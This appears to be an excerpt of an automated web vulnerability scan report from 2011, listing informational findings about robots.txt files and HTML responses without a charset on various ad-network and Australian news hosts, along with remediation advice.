19.18. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d3/jsc/gl.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

19.19. http://data.weatherzone.com.au/json/animator/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.weatherzone.com.au
Path:	/json/animator/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: data.weatherzone.com.au

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Last-Modified: Fri, 08 Jan 2010 03:47:44 GMT
Content-Type: text/plain
Cache-Control: max-age=60
Expires: Wed, 07 Sep 2011 14:18:00 GMT
Date: Wed, 07 Sep 2011 14:17:00 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /

19.20. http://g-pixel.invitemedia.com/gmatcher previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://g-pixel.invitemedia.com
Path:	/gmatcher

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

19.21. http://g.ca.bid.invitemedia.com/rubicon_imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://g.ca.bid.invitemedia.com
Path:	/rubicon_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: g.ca.bid.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:14 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

19.22. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/130511/0/vj

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: hpi.rotator.hadj7.adjuggler.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"26-1315378660000"
Last-Modified: Wed, 07 Sep 2011 06:57:40 GMT
Content-Type: text/plain
Content-Length: 26
Date: Wed, 07 Sep 2011 14:14:19 GMT
Connection: close

User-agent: *
Disallow: /

19.23. http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img-cdn.mediaplex.com
Path:	/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=ISO-8859-1
Date: Wed, 07 Sep 2011 14:14:24 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

19.24. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:19 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

19.25. http://l.addthiscdn.com/live/t00/250lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Wed, 07 Sep 2011 14:21:42 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

19.26. http://m.xp1.ru4.com/activity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m.xp1.ru4.com

Response

19.27. http://map.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://map.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Wed, 07 Sep 2011 14:14:30 GMT
Connection: close

# go away
User-agent: *
Disallow: /

19.28. http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.smh.com.au
Path:	/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: news.smh.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 07 Sep 2011 13:34:49 GMT
Pragma: no-cache
X-Cnection: close
Content-disposition: inline
Content-Language: en-AU
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Type: text/plain;charset=ISO-8859-1
Expires: Wed, 07 Sep 2011 14:15:26 GMT
Date: Wed, 07 Sep 2011 14:15:26 GMT
Content-Length: 247
Connection: close

User-agent: *

Disallow: /action/emailToFriend
Disallow: /action/printArticle
Disallow: /cgi-bin/common/popupEmailArticle.pl?path=/
Disallow: /cgi-bin/common/popupPrintArticle.pl?path=/
Disallow: /cgi
...[SNIP]...

19.29. http://pagead2.googlesyndication.com/pagead/imgad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Wed, 07 Sep 2011 12:32:17 GMT
Expires: Thu, 08 Sep 2011 12:32:17 GMT
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 6131

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

19.30. http://pixel.adblade.com/log.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.adblade.com
Path:	/log.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.adblade.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "2884875378"
Last-Modified: Fri, 21 Aug 2009 13:46:26 GMT
Content-Length: 28
Connection: close
Date: Wed, 07 Sep 2011 14:14:18 GMT
Server: lighttpd/1.4.21

User-agent: *
Disallow: /

19.31. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:21 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

19.32. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-e4m3Yko6bFYVc.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Thu, 08 Sep 2011 14:14:09 GMT
Content-Type: text/plain
Content-Length: 26
Date: Wed, 07 Sep 2011 14:14:09 GMT
Server: QS

User-agent: *
Disallow: /

19.33. http://row.bc.yahoo.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://row.bc.yahoo.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: row.bc.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 03 Mar 2006 21:55:13 GMT
Accept-Ranges: bytes
Content-Length: 41
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# Do not crawl
User-agent: *
Disallow: /

19.34. http://s0.2mdn.net/2878385/rsvp_type_300x125.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/2878385/rsvp_type_300x125.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 07 Sep 2011 14:15:22 GMT
Expires: Thu, 08 Sep 2011 14:15:22 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

19.35. http://s1.2mdn.net/2977403/Yahoo_Homeroom_Texas_300x250.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s1.2mdn.net
Path:	/2977403/Yahoo_Homeroom_Texas_300x250.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s1.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 07 Sep 2011 14:15:27 GMT
Expires: Thu, 08 Sep 2011 14:15:27 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

19.36. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Wed, 07 Sep 2011 14:18:20 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

19.37. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x1 pid 0x24bd 9405
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

19.38. http://tags.mathtag.com/view/js/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.mathtag.com
Path:	/view/js/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tags.mathtag.com

Response

HTTP/1.1 200 OK
x-mm-host: pao-bidder-x1
Server: MMBD/3.5.14.3
Content-Type: text/plain
Date: Wed, 07 Sep 2011 14:15:20 GMT
Connection: close
Content-Length: 25

User-agent: *
Disallow: /

19.39. http://traktr.news.com.au/esi/traktr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://traktr.news.com.au
Path:	/esi/traktr.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: traktr.news.com.au

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "bbbcde0b15cabd06aace1df82d335978:1278978662"
Last-Modified: Sun, 06 Sep 2009 23:13:55 GMT
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=3600
Date: Wed, 07 Sep 2011 14:14:32 GMT
Connection: close

User-agent: *
Disallow: /

19.40. http://web.adblade.com/imps.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web.adblade.com
Path:	/imps.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: web.adblade.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "4028906057"
Last-Modified: Mon, 22 Jun 2009 12:30:55 GMT
Content-Length: 28
Connection: close
Date: Wed, 07 Sep 2011 14:14:15 GMT
Server: lighttpd/1.4.23

User-agent: *
Disallow: /

19.41. http://webservice.theweather.com.au/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webservice.theweather.com.au
Path:	/crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: webservice.theweather.com.au

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Last-Modified: Wed, 11 Aug 2010 00:55:00 GMT
ETag: "10c06c-1a-48d81b2fc0100"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Wed, 07 Sep 2011 14:20:05 GMT
Date: Wed, 07 Sep 2011 14:15:05 GMT
Connection: close

User-agent: *
Disallow: /

19.42. http://www.6pr.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.6pr.com.au
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.6pr.com.au

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:42 GMT
Server: Apache
Age: 0
Last-Modified: Wed, 07 Sep 2011 14:14:42 GMT
Pragma: no-cache
Connection: close
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-disposition: inline
Content-Language: en-AU
Content-Length: 26
Content-Type: text/plain;charset=ISO-8859-1

User-agent: *
Disallow:

19.43. http://www.7perth.com.au/view/seven-news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.7perth.com.au
Path:	/view/seven-news/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.7perth.com.au

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:20 GMT
ETag: "22943-28-49ef728f38000"
Last-Modified: Mon, 21 Mar 2011 05:11:28 GMT
Server: Apache/2.2.16 (Amazon)
Content-Length: 40
Connection: Close

User-Agent: *
Disallow: /upload/private/

19.44. http://www.abc.net.au/perth/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/perth/news/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abc.net.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 11 Jul 2011 00:41:15 GMT
ETag: "835d68-31b-70cec0c0"
Accept-Ranges: bytes
Content-Length: 795
Content-Type: text/plain
Cache-Control: max-age=139
Expires: Wed, 07 Sep 2011 14:16:32 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close

# robots.txt for http://www.abc.net.au/ -- ABC Online
User-agent: *
Disallow: /classic/contact/concerts.htm
Disallow: /classic/contact/default.htm
Disallow: /classic/contact/eventsdiary.htm
Disallow:
...[SNIP]...

19.45. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adfusion.com
Path:	/Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adfusion.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 16 Aug 2011 14:41:28 GMT
Accept-Ranges: bytes
ETag: "16c1e294225ccc1:e0a"
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:16:58 GMT
Connection: close

User-agent: *
Disallow:

19.46. http://www.bcl.com.au/perth/news.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bcl.com.au
Path:	/perth/news.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bcl.com.au

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 14 Apr 2010 05:55:53 GMT
Accept-Ranges: bytes
ETag: "a2fdde2497dbca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:15:08 GMT
Connection: close
Content-Length: 426

User-agent: *

Disallow: /ftp/
Disallow: /bcl/
Disallow: /goto/
Disallow: /nsw/newcastle/
Disallow: /nsw/coffsharbour/
Disallow: /nsw/armidale/
Disallow: /nsw/bluemountains/
Disallow: /nsw/ba
...[SNIP]...

19.47. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.54.34
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

19.48. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Wed, 07 Sep 2011 14:14:19 GMT
Expires: Wed, 07 Sep 2011 14:14:19 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

19.49. http://www.news.com.au/mercury/images/bg-local-guides.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.news.com.au
Path:	/mercury/images/bg-local-guides.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.news.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 18 May 2011 08:34:20 GMT
ETag: "fb0ddc-118-4a388c1413b00"
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: MISS from news.com.au:80
X-Cache-Lookup: MISS from news.com.au:80
Vary: Surrogate-Capability
Vary: Host
Cache-Control: max-age=843
Expires: Wed, 07 Sep 2011 14:32:25 GMT
Date: Wed, 07 Sep 2011 14:18:22 GMT
Content-Length: 280
Connection: close

User-agent: *

Disallow: /*comments-*
Disallow: /*print/*
Disallow: /*email/*
Disallow: /*SIT*
Disallow: /*.swf
Disallow: /printpage/
Disallow: */404*
Sitemap: http://www.news.com.au/sitemap.
...[SNIP]...

19.50. http://www.perthnow.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.perthnow.com.au
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.perthnow.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 18 May 2011 08:34:28 GMT
ETag: "45daef-258-4a388c1bb4d00"
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: MISS from news.com.au:80
X-Cache-Lookup: MISS from news.com.au:80
Vary: Surrogate-Capability
Vary: Host
Cache-Control: max-age=855
Expires: Wed, 07 Sep 2011 14:28:21 GMT
Date: Wed, 07 Sep 2011 14:14:06 GMT
Content-Length: 600
Connection: close

#Agent Specific Disallowed Sections
User-agent: NewsNow
Disallow: /

User-agent: *

Disallow: /*comments-*
Disallow: /*print/*
Disallow: /*email/*
Disallow: /*SIT*
Disallow: /*.swf
Disallow
...[SNIP]...

19.51. http://www.smh.com.au/images/promo/St_George_logo60x26.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smh.com.au
Path:	/images/promo/St_George_logo60x26.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smh.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Pragma: no-cache
X-Cnection: close
Content-disposition: inline
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Type: text/plain; charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:10 GMT
Content-Length: 247
Connection: close

User-agent: *

Disallow: /action/emailToFriend
Disallow: /action/printArticle
Disallow: /cgi-bin/common/popupEmailArticle.pl?path=/
Disallow: /cgi-bin/common/popupPrintArticle.pl?path=/
Disallow: /cgi
...[SNIP]...

19.52. http://www.themercury.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.themercury.com.au
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.themercury.com.au

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "b1dbd9cb71b9dda8dd646ff6cceb0a4b:1315386301"
Last-Modified: Wed, 07 Sep 2011 09:05:01 GMT
Accept-Ranges: bytes
Content-Length: 220
Content-Type: text/plain
Date: Wed, 07 Sep 2011 14:16:51 GMT
Connection: close
X-N: S

#Agent Specific Disallowed Sections
User-agent: NewsNow
Disallow: /

User-agent: *

Disallow: /*comments-*
Disallow: /*print/*
Disallow: /*email/*
Disallow: /*SIT*
Disallow: /*.swf
Disallow: /printpag
...[SNIP]...

19.53. http://www.watoday.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.watoday.com.au
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.watoday.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Pragma: no-cache
X-Cnection: close
Content-disposition: inline
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Type: text/plain; charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:09 GMT
Content-Length: 247
Connection: close

User-agent: *

Disallow: /action/emailToFriend
Disallow: /action/printArticle
Disallow: /cgi-bin/common/popupEmailArticle.pl?path=/
Disallow: /cgi-bin/common/popupPrintArticle.pl?path=/
Disallow: /cgi
...[SNIP]...

20. HTML does not specify charset previous next
There are 48 instances of this issue:

http://ad.au.doubleclick.net/adi/N5960.283587.YAHOONEWSAU/B5726304.3
http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16
http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.2
http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.9
http://ad.yieldmanager.com/iframe3
http://cti.w55c.net/ct/cms-2-frame.html
http://cti.w55c.net/ct/rubicon-cms2.html
http://d3.zedo.com/jsc/d3/ff2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html
http://pixel.invitemedia.com/data_sync
http://pixel.invitemedia.com/rubicon_sync
http://resources.6pr.f2.com.au/myTalkNetwork/6pr/css/img/bg_weather.gif
http://resources.smh.com.au/common/media-common-1.0/css/output/common.skin.breakingnewsnational_min.css
http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/02/06/tn_165705.jpg/%22
http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/07/13/tn_197121.jpg/%22
http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/23/tn_203731.jpg/%22
http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/25/tn_204251.jpg/%22
http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/30/tn_205931.jpg/%22
http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/09/02/tn_206341.jpg/%22
http://tools.ntnews.com.au/favicon.ico
http://tools.ntnews.com.au/feeds/feed-breakingnews-datelist.php
http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php
http://tools.ntnews.com.au/search-results/adsense_frontpage_js.php
http://tools.ntnews.com.au/search-results/adsense_frontpage_js3.php
http://tools.ntnews.com.au/weather/weather_panel.php
http://tools.ntnews.com.au/yoursay/article_page_comments.php
http://tools.ntnews.com.au/yoursay/article_single_comment.php
http://tools.themercury.com.au/feeds/feed-ticker.php
http://tools.themercury.com.au/feeds/feed-with-lead.php
http://tools.themercury.com.au/misc/datetime.php
http://tools.themercury.com.au/photo-gallery/featuredgallery.php
http://tools.themercury.com.au/search-results/adsense_js.php
http://tools.themercury.com.au/search-results/adsense_wide_js_skip3.php
http://tools.themercury.com.au/video/featuredvideo.php
http://tools.themercury.com.au/weather/weather_inc.php
http://tools.themercury.com.au/yoursay/article_page_comments.php
http://tools.themercury.com.au/yoursay/yoursay-single-extract.php
http://uac.advertising.com/wrapper/aceUACping.htm
http://weather.news.com.au/wa/perth/perth
http://weather.news.com.au/widgets/local/
http://weather.news.com.au/widgets/monthly-almanac/
http://weather.news.com.au/widgets/radar/
http://weather.news.com.au/widgets/satellite/
http://www.abc.net.au/res/abc/submenus.htm
http://www.bcl.com.au/perth/news.htm

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

20.1. http://ad.au.doubleclick.net/adi/N5960.283587.YAHOONEWSAU/B5726304.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adi/N5960.283587.YAHOONEWSAU/B5726304.3

Request

Response

20.2. http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adi/N799.Yahoo1/B4631682.16

Request

Response

20.3. http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3753.158901.DATAXU/B5319162.2

Request

Response

20.4. http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.9 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3753.158901.DATAXU/B5319162.9

Request

Response

20.5. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

